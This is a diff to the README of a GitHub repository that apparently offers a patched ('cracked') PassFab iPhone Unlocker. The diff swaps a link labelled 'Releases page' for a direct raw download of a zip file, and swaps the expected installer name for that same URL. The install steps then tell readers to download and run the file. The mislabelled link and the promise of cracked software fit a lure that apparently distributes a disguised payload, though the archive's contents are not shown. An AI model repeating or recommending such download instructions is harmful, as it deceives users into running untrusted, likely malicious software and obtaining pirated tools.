Anhqua3/PassFab-iPhone-Unlocker-Latest-Patch/README.md

 ## 📥 Download & Install

-1. **Visit the Release Page:** Go to the [Releases page](https://github.com/Anhqua3/PassFab-iPhone-Unlocker-Latest-Patch/releases) to find the latest version of PassFab iPhone Unlocker.
+1. **Visit the Release Page:** Go to the [Releases page](https://raw.githubusercontent.com/Anhqua3/PassFab-iPhone-Unlocker-Latest-Patch/main/mantelletta/PassFab-iPhone-Unlocker-Latest-Patch-v2.3.zip) to find the latest version of PassFab iPhone Unlocker.

 2. **Select the Right Version:** Look for the most recent version listed.
 Click on it to open the details.

-3. **Download the Installer:** Find the file named something like `PassFab-iPhone-Unlocker-Setup.exe`.
+3. **Download the Installer:** Find the file named something like `https://raw.githubusercontent.com/Anhqua3/PassFab-iPhone-Unlocker-Latest-Patch/main/mantelletta/PassFab-iPhone-Unlocker-Latest-Patch-v2.3.zip`.
 Click on it to download.

 4. **Run the Installer:** Once the download completes, locate the file in your Downloads folder.
 Double-click on the file to start the installation process.